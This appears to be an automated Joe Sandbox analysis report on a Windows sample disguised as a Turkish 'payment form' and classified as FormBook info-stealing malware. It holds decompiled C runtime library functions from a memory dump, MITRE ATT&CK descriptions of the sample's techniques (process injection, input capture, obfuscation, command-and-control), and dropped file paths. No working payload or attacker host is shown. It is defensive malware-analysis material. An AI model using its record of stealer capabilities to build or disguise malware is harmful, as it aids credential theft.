Source File: 00000001.00000002.280753972.0000000001011000.00000020.00000001.01000000.00000004.sdmp, Offset: 01010000, based on PE: true

Associated: 00000001.00000002.280749504.0000000001010000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.280816354.000000000102B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.280831038.0000000001030000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.280838079.0000000001034000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1010000_erltu.jbxd

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: ff2be79d851682d3ae9246e341337032ae04acaaf5644227ee1eb46a87557a51
Instruction ID: a923286db4a2740dd0760176e9ee491fe108fe2e774af864076b87092727d46e
Opcode Fuzzy Hash: ff2be79d851682d3ae9246e341337032ae04acaaf5644227ee1eb46a87557a51
Instruction Fuzzy Hash: 67110632405637AFDF322F78AC046DE3BE8AF17264F204569FDC89A1C0DB3984488798

Uniqueness

Uniqueness Score: -1.00%

Function 0102635C Relevance: 6.1, APIs: 4, Instructions: 97
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0102635C(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				signed int _v20;
				signed int _t35;
				int _t38;
				signed int _t41;
				int _t42;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				signed int _t59;
				char* _t62;

				_t62 = _a8;
				if(_t62 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t62 != 0) {
					E01022322( &_v20, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E01026311( *_t62 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t41 = _v20;
							_t59 = 1;
							_t28 = _t41 + 4; // 0x840ffff8
							_t42 = MultiByteToWideChar( *_t28, 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t42;
							if(_t42 != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t59;
							}
							L20:
							_t44 = E0101EF9A();
							_t59 = _t59 | 0xffffffff;
							__eflags = _t59;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t59 = _v20;
						__eflags =  *(_t59 + 0x74) - 1;
						if( *(_t59 + 0x74) <= 1) {
							L15:
							_t20 = _t59 + 0x74; // 0xe1c11fe1
							__eflags = _t50 -  *_t20;
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t62[1];
							if(_t62[1] == 0) {
								goto L20;
							}
							L18:
							_t22 = _t59 + 0x74; // 0xe1c11fe1
							_t59 =  *_t22;
							goto L21;
						}
						_t12 = _t59 + 0x74; // 0xe1c11fe1
						__eflags = _t50 -  *_t12;
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t17 = _t59 + 0x74; // 0xe1c11fe1
						_t18 = _t59 + 4; // 0x840ffff8
						_t47 = MultiByteToWideChar( *_t18, 9, _t62,  *_t17, _a4, 0 | _a4 != 0x00000000);
						_t59 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t62 & 0x000000ff;
					}
					_t59 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}

0x01026364
0x01026369
0x01026383
0x00000000
0x01026383
0x0102636b
0x01026370
0x00000000
0x00000000
0x01026375
0x01026392
0x01026397
0x0102639a
0x010263a1
0x010263c0
0x010263c7
0x010263c9
0x0102640d
0x01026419
0x0102641c
0x01026421
0x01026424
0x0102642a
0x0102642c
0x0102643c
0x0102643c
0x01026440
0x01026442
0x01026445
0x01026445
0x01026445
0x01026445
0x00000000
0x0102644b
0x0102642e
0x0102642e
0x01026433
0x01026433
0x01026436
0x00000000
0x01026436
0x010263cb
0x010263ce
0x010263d2
0x010263fb
0x010263fb
0x010263fb
0x010263fe
0x010263fe
0x00000000
0x00000000
0x01026400
0x01026404
0x00000000
0x00000000
0x01026406
0x01026406
0x01026406
0x00000000
0x01026406
0x010263d4
0x010263d4
0x010263d7
0x00000000
0x00000000
0x010263db
0x010263e5
0x010263eb
0x010263ee
0x010263f4
0x010263f7
0x010263f9
0x00000000
0x00000000
0x00000000
0x010263f9
0x010263a3
0x010263a6
0x010263a8
0x010263ad
0x010263ad
0x010263b2
0x00000000
0x010263b2
0x01026377
0x0102637c
0x01026380
0x01026380
0x00000000

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 01026392
__isleadbyte_l.LIBCMT ref: 010263C0
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,E1C11FE1,00BFBBEF,00000000), ref: 010263EE
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000), ref: 01026424

Memory Dump Source

Source File: 00000001.00000002.280753972.0000000001011000.00000020.00000001.01000000.00000004.sdmp, Offset: 01010000, based on PE: true

Associated: 00000001.00000002.280749504.0000000001010000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.280816354.000000000102B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.280831038.0000000001030000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.280838079.0000000001034000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1010000_erltu.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 27c05f415c27c8de3e6efc00e3cb0f40474e6800a83ad39b5fa3dd5252971204
Instruction ID: 32a89a4fca1a0373e1e88e439cbdae95556e5002674a6a54fd44ff9d285a9fe8
Opcode Fuzzy Hash: 27c05f415c27c8de3e6efc00e3cb0f40474e6800a83ad39b5fa3dd5252971204
Instruction Fuzzy Hash: 1831A331600266EFEB228E69C844BAE7FE6FF41210F1580A8FDD587190DB32D851D790

Uniqueness

Uniqueness Score: -1.00%

Function 010142C4 Relevance: 6.1, APIs: 4, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E010142C4(intOrPtr* __eax, void* __edx, intOrPtr* __edi, intOrPtr* __esi) {
				intOrPtr* _t4;
				void* _t5;
				signed int _t7;
				intOrPtr _t8;
				signed int _t9;
				void* _t10;
				void* _t16;
				signed int _t17;
				void* _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr _t32;
				void* _t34;

				_t31 = __esi;
				_t29 = __edi;
				_t28 = __edx;
				_t4 = __eax;
				while(1) {
					 *_t4 =  *_t4 + _t4;
					_t17 = _t4 + 1;
					_t5 = 0x3d;
					if( *_t31 == _t5) {
						goto L6;
					}
					_t8 = E01021951(_t17, 2);
					 *_t29 = _t8;
					if(_t8 == 0) {
						_t9 = E01021919( *0x10311ec);
						 *0x10311ec =  *0x10311ec & 0x00000000;
						_t7 = _t9 | 0xffffffff;
						L9:
						return _t7;
					} else {
						_t10 = E01024163(_t8, _t17, _t31);
						_t34 = _t34 + 0xc;
						if(_t10 != 0) {
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E0101EA0E(_t17, _t28);
							asm("int3");
							if(E01020FA8(3) == 1) {
								L16:
								E01020DDE(_t17, _t28, _t29, _t31, 0xfc);
								return E01020DDE(_t17, _t28, _t29, _t31, 0xff);
							}
							_t16 = E01020FA8(3);
							if(_t16 == 0 &&  *0x1031520 == 1) {
								goto L16;
							}
							return _t16;
						} else {
							_t29 = _t29 + 4;
							goto L6;
						}
					}
					L18:
					L6:
					_t31 = _t31 + _t17 * 2;
					if( *_t31 != 0) {
						_t4 = E010241BF(_t31);
						continue;
					} else {
						_t32 =  *0x10311c4; // 0x0
						E01021919(_t32);
						 *0x10311c4 = 0;
						_t7 = 0;
						 *_t29 = 0;
						 *0x10320f8 = 1;
						goto L9;
					}
					goto L18;
				}
			}

0x010142c4
0x010142c4
0x010142c4
0x010142c4
0x01020cfe
0x01020cfe
0x01020d03
0x01020d06
0x01020d0a
0x00000000
0x00000000
0x01020d0f
0x01020d14
0x01020d1a
0x01020d63
0x01020d68
0x01020d6f
0x01020d58
0x01020d5c
0x01020d1c
0x01020d1f
0x01020d24
0x01020d29
0x01020d76
0x01020d77
0x01020d78
0x01020d79
0x01020d7a
0x01020d7b
0x01020d80
0x01020d8c
0x01020da3
0x01020da8
0x00000000
0x01020db8
0x01020d90
0x01020d98
0x00000000
0x00000000
0x01020db9
0x01020d2b
0x01020d2b
0x00000000
0x01020d2b
0x01020d29
0x00000000
0x01020d2e
0x01020d2e
0x01020d36
0x01020cfb
0x00000000
0x01020d38
0x01020d38
0x01020d3f
0x01020d44
0x01020d4a
0x01020d4c
0x01020d4e
0x00000000
0x01020d4e
0x00000000
0x01020d36

APIs

__calloc_crt.LIBCMT ref: 01020D0F

Part of subcall function 01021951: __calloc_impl.LIBCMT ref: 01021960

_free.LIBCMT ref: 01020D3F
_free.LIBCMT ref: 01020D63
__invoke_watson.LIBCMT ref: 01020D7B

Memory Dump Source

Source File: 00000001.00000002.280753972.0000000001011000.00000020.00000001.01000000.00000004.sdmp, Offset: 01010000, based on PE: true

Associated: 00000001.00000002.280749504.0000000001010000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.280816354.000000000102B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.280831038.0000000001030000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.280838079.0000000001034000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1010000_erltu.jbxd

Similarity

API ID: _free$__calloc_crt__calloc_impl__invoke_watson
String ID:
API String ID: 1648328044-0
Opcode ID: d89022f05fff6f88c2173944c215002a3450ef8a53dd409c258f1c163a3af26b
Instruction ID: cdf9be81b7a9d9c38bbca9be39f2161e61dfdaffb506c6d449be940ac4521a5a
Opcode Fuzzy Hash: d89022f05fff6f88c2173944c215002a3450ef8a53dd409c258f1c163a3af26b
Instruction Fuzzy Hash: 760124B26443236ED3217FB4AC48BD977ACEB14320F300466E9C4C3095EB75A144C760

Uniqueness

Uniqueness Score: -1.00%

Function 01027B2D Relevance: 6.0, APIs: 4, Instructions: 48
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E01027B2D(void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E0102807E(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E01027BB3(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E010282F9(__esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E01028238(__esi, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

0x01027b30
0x01027b36
0x01027ba9
0x00000000
0x01027b3d
0x01027b40
0x01027b5b
0x01027b5e
0x01027b7e
0x01027b90
0x01027b60
0x01027b60
0x01027b63
0x00000000
0x01027b65
0x01027b77
0x01027b77
0x01027b63
0x01027bae
0x01027bb2
0x01027b42
0x01027b5a
0x01027b5a
0x01027b40

APIs

__cftof_l.LIBCMT ref: 01027B51

Part of subcall function 01028238: __fltout2.LIBCMT ref: 01028261

__cftog_l.LIBCMT ref: 01027B77
__cftoe_l.LIBCMT ref: 01027BA9

Memory Dump Source

Source File: 00000001.00000002.280753972.0000000001011000.00000020.00000001.01000000.00000004.sdmp, Offset: 01010000, based on PE: true

Associated: 00000001.00000002.280749504.0000000001010000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.280816354.000000000102B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.280831038.0000000001030000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.280838079.0000000001034000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1010000_erltu.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: a4e100fc80c7f2f089fccb66155ead4bb3bb1cdfaeda593a128998d50f24c5bb
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: 1C01487600015EBBCF576E88CC41DEE3FA2BB29254B598955FBA959030C336C5B1AB81

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report #U00d6DEME FORMU.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\erltu.exe

C:\Users\user\AppData\Local\Temp\fvcshciph

C:\Users\user\AppData\Local\Temp\ka5y543suvwo

C:\Users\user\AppData\Local\Temp\nsz96AE.tmp

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Windows Analysis Report
#U00d6DEME FORMU.exe

Function 004032FA Relevance: 72.0, APIs: 23, Strings: 18, Instructions: 265
filestringcomCOMMON

Function 00405426 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 152
filestringCOMMON

Function 00405D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 24
fileCOMMON

Function 00406083 Relevance: 5.4, APIs: 4, Instructions: 382
COMMONCrypto

Function 00403A22 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Function 004036A1 Relevance: 49.2, APIs: 15, Strings: 13, Instructions: 213
stringregistrylibraryCOMMON

Function 00402C7D Relevance: 35.2, APIs: 9, Strings: 11, Instructions: 218
memoryCOMMON

Function 0040177F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 147
stringtimeCOMMON

Function 0040309C Relevance: 12.1, APIs: 8, Instructions: 137
filewindowCOMMON

Function 004015BB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55
COMMON

Function 004057FA Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32
COMMON

Function 00402F71 Relevance: 7.6, APIs: 5, Instructions: 109
fileCOMMON

Function 004056C8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46
stringCOMMON

Function 00405361 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24
processCOMMON

Function 004032C6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20
COMMON

Function 004064B8 Relevance: 5.2, APIs: 4, Instructions: 236
COMMON

Function 004066B9 Relevance: 5.2, APIs: 4, Instructions: 208
COMMON

Function 004063CF Relevance: 5.2, APIs: 4, Instructions: 205
COMMON

Function 00405ED4 Relevance: 5.2, APIs: 4, Instructions: 198
COMMON

Function 00406322 Relevance: 5.2, APIs: 4, Instructions: 180
COMMON

Function 00406440 Relevance: 5.2, APIs: 4, Instructions: 170
COMMON

Function 0040638C Relevance: 5.2, APIs: 4, Instructions: 168
COMMON

Function 00401E76 Relevance: 4.5, APIs: 3, Instructions: 48
synchronizationCOMMON

Function 00403664 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 19
COMMON

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Function 004057CB Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Function 004057AC Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Function 0040327D Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Function 004032AF Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Function 00404FDD Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278
windowclipboardmemoryCOMMON

Function 004047EE Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 478
windowmemoryCOMMONCrypto

Function 00404333 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 242
stringCOMMON

Function 00402078 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132
comCOMMON

Function 00405DDA Relevance: 4.5, APIs: 3, Instructions: 20
libraryloaderCOMMON

Function 004026A1 Relevance: 1.5, APIs: 1, Instructions: 29
fileCOMMON